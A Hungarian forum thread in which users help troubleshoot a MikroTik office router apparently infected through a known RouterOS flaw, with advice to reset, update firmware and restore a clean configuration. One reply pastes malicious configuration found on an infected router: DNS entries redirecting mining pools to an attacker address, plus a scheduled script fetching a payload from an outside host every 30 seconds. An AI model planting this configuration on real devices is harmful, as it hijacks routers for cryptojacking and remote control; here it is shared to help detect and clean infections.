Fertőzött Mikrotik?

Hálózati eszközök

Egy közeli ismerősöm üzemeltet két irodai rendszert, amelyek Mikrotik 750g routerekkel VPN-nel vannak összekötve. Az egyik router mögött minden rendben van, a másik mögött azonban bármelyik böngészőt használva, bármelyik sz.gépen a meglátogatni kívánt oldalak helyett sokszor valami olyasmi jön, hogy:

avast; Fenyegetés ártalmatlanítva; Biztonságosan megszakítottuk a kapcsolatot stb.

E router mögött egy laptop is ezt produkálja, de ha a kolléga hazaviszi, akkor ott nem jelentkezik a probléma.
Aki korábban konfigurálta a routereket külföldre ment. Ha valaki tudna segíteni, akár a helyszínen is, magánban is megkereshet.

  • 4941 megtekintés

( zitev v | 2018. 09. 20., cs – 19:32 )

Siman lehet fals riasztás, az avast nem egy biztonsagtechnikai referencia termék. Csekkold valami mással is!

--
"Nem akkor van baj amikor nincs baj, hanem amikor van!"
Népi bölcsesség

( procika v | 2018. 09. 20., cs – 20:08 )

Elsőre nézd meg benne a tűzfal szabályokat. Ha találsz egy rakat üzenetet ismeretlen szabályok komment mezőjében akkor reset.

( KicsiBocs | 2018. 09. 20., cs – 20:15 )

A log mutat vmi? Tűzfal beállítások? Vannak esetleg nem oda illő fájlok a router-en? Érdemes lenne a jelenlegi beállításokat lementeni/exportálni és teljesen reset-elni a router-t, majd frissíteni (ros/firmware) és elkezdeni előröl a konfigurálást. Tűzfalnál a szokásos szabály: mindent tiltunk kivéve amit engedünk. A felesleges szolgáltatásokat is tiltani kell a router-en: https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router

( vlezlee | 2018. 09. 20., cs – 20:23 )

Azt az avastot és úgy általában minden A betűvel kezdődő vírusirtót felejts el!
Brutál módon megfogja a gépet, minden szarra fals pozitív riasztásai vannak, random windows szolgáltatásokat fog meg és az összes kártevő bejön mellette.

Nem lehet, hogy a vpn-en megy át a komplett irodai web forgalom?

( mauzi v | 2018. 09. 20., cs – 20:58 )

Mikrotik verzió?
mikrotik.php a schedulerben?

( gigalomania v | 2018. 09. 20., cs – 22:26 )

"Egy közeli ismerősöm üzemeltet ..."

( ncc1701 | 2018. 09. 21., p – 06:18 )

Frissítsétek meg. Csak rá kell másolni a szükséges fájlt, és újraindítani.

( kantal | 2018. 09. 21., p – 08:23 )

Köszönöm az eddigi érdemi hozzászólásokat. Egy kis ideig eltart, amíg feldolgozzuk, kipróbáljuk a javaslatokat.
--
eutlantis

( elod v | 2018. 09. 21., p – 08:50 )

1. Export parancs futtatása parancssorból. Innen elég gyorsan kiderül hogy fertőzött e
2. Régi konfig visszatöltése
3. Firmware upgrade

Ilyeneket találtam pl:
/ip dns static
add address=185.206.144.149 name=asia1.ethermine.org
add address=185.206.144.149 name=asia1.ethpool.org
add address=185.206.144.149 name=asia1.fullhashed.com
add address=185.206.144.149 name=asia2.ethermine.org
add address=185.206.144.149 name=cn.sparkpool.com
add address=185.206.144.149 name=aurorapool.net
add address=185.206.144.149 name=daggerhashimoto.br.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.eu.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.hk.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.in.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.jp.nicehash.com
add address=185.206.144.149 name=daggerhashimoto.usa.nicehash.com

/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=
"/tool fetch address=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=no"

( kantal | 2018. 09. 21., p – 13:10 )

Köszönjük a segítséget. Az új firmware rátöltése megoldotta a problémát.

--
eutlantis

( KicsiBocs | 2018. 09. 22., szo – 13:46 )

A Routerboard-ot (bootloader) is frissítettétek? New terminal -> /system routerboard upgrade ,és utána /system reboot.

( uid_395 v | 2018. 09. 21., p – 16:09 )

baszki zárjátok már le a code tageket.

( hg2ebh | 2018. 09. 21., p – 16:14 )

> Frissítsétek meg. Csak rá kell másolni a szükséges fájlt, és újraindítani.

Úgy érted, hogy licensz kulcs export, teljes NAND formatálás bootloader-ből, NETINSTALL-al újratelepítés tiszta forrásból, majd konfig visszaállítása? ;)

Ja, az kimarad.
Mondjuk nekem eleve nem érhető el kintről (egy helyet leszámítva), előbb be VPN-ezek bentre, aztán onnan érem el. Ha nem tudok bejutni VPN-el, akkor kb nincs internet, tehát nem érném el amúgy sem kintről, ha meg elérem akkor meg tudom tekergetni így is. :)

--
Tanya Csenöl az új csatorna

( kantal | 2018. 09. 22., szo – 08:32 )

Még egyszer köszi. Ez lett:

winboxban:
system - package - check for update - update
majd a wincsiről a március mentés
files - upload - restore
---
restore után jelenleg ez van:
mikrotik.php-t nem láttam hogy lenne
a web proxy ki van kapcsolva
scheduler üres
ip - socks üres

--
eutlantis

( toMpEr | 2018. 10. 09., k – 00:19 )

> PoC Attack Escalates MikroTik Router Bug to ‘As Bad As It Gets’
> Researchers say a medium severity bug should now be rated critical because of a new hack technique that allows for remote code execution on MikroTik edge and consumer routers.
> While MikroTik patched CVE-2018-14847 in early August, a recent scan by Tenable Research revealed only approximately 30 percent of vulnerable modems have been patched, which leaves approximately 200,000 routers vulnerable to attack. MikroTik’s RouterOS powers the company’s business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.

https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-b…

( vlezlee | 2018. 10. 09., k – 20:40 )

A családban találtam egy hAP lite-ot ami fel van törve, ebbe konkrétan belépni sem tudok.
Esetleg van valakinek infója, hogy mire változik az admin user jelszava? Kíváncsi vagyok mit műveltek benne.